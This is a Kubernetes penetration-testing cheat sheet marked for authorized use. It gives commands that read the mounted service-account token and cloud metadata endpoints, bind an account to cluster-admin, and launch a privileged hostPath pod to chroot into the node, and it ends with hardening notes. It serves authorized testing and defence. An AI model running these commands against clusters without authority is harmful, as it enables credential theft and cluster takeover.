โ† All cheat sheets

KUBERNETES-PENTEST

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

Attacking and auditing Kubernetes clusters: enumeration, RBAC abuse,
pod escapes and lateral movement. Reference for authorized testing only.

ENUMERATION#

  Cluster access & context:
    kubectl config view                     # current kubeconfig
    kubectl config get-contexts
    kubectl cluster-info
    kubectl version --short
    kubectl get nodes -o wide

  What can I do? (RBAC self-review)
    kubectl auth can-i --list
    kubectl auth can-i create pods
    kubectl auth can-i get secrets --all-namespaces
    kubectl auth can-i '*' '*'                 # cluster-admin check

  Inventory:
    kubectl get pods -A -o wide
    kubectl get secrets -A
    kubectl get serviceaccounts -A
    kubectl get roles,rolebindings,clusterroles,clusterrolebindings -A
    kubectl describe pod <pod> -n <ns>

IN-POD RECON (compromised container)#

  Service account token (mounted by default):
    cat /var/run/secrets/kubernetes.io/serviceaccount/token
    cat /var/run/secrets/kubernetes.io/serviceaccount/namespace
    CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
    TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
    APISERVER=https://kubernetes.default.svc

  Query the API with the pod token:
    curl --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
      $APISERVER/api/v1/namespaces/default/pods

  Cloud metadata (if reachable from the pod):
    curl http://169.254.169.254/latest/meta-data/           # AWS
    curl -H "Metadata-Flavor: Google" \
      http://metadata.google.internal/computeMetadata/v1/    # GCP

RBAC ABUSE / PRIVILEGE ESCALATION#

  Dangerous verbs to hunt for on a role you control:
    create pods                # run a privileged pod
    create pods/exec           # exec into any pod
    get/list secrets           # harvest credentials
    escalate / bind            # grant yourself more rights
    impersonate                # act as another user/SA
    create clusterrolebindings # bind yourself to cluster-admin

  Bind yourself to cluster-admin (if you hold bind):
    kubectl create clusterrolebinding pwn \
      --clusterrole=cluster-admin --serviceaccount=<ns>:<sa>

PRIVILEGED / ESCAPE-PRONE POD#

  Launch a pod that mounts the host filesystem (if allowed):
    # pod.yaml -> hostPID: true, privileged: true, volume hostPath: /
    kubectl apply -f pod.yaml
    kubectl exec -it hostpod -- chroot /host bash

  Red flags in a pod spec:
    securityContext.privileged: true
    hostPID / hostNetwork / hostIPC: true
    volumeMounts of hostPath: /   or /var/run/docker.sock
    capabilities.add: [SYS_ADMIN]

TOOLING#

  kube-hunter        # remote/agent cluster attack surface scan
  kubeaudit          # audit workloads for common misconfig
  kubescape          # posture scan (NSA/MITRE frameworks)
  peirates           # in-pod escalation toolkit
  botb (break-out-the-box)  # container escape checks

HARDENING NOTES (blue side)#

  - Disable auto-mount of SA tokens where not needed.
  - Enforce Pod Security Admission (restricted profile).
  - Least-privilege RBAC; no wildcard verbs/resources.
  - NetworkPolicies to block pod -> metadata endpoint.
  - Audit logging on the API server; alert on exec/secrets access.

  See also: DOCKER-SECURITY, IAC-SECURITY, GCP-SECURITY, AWS-IAM-PRIVESC.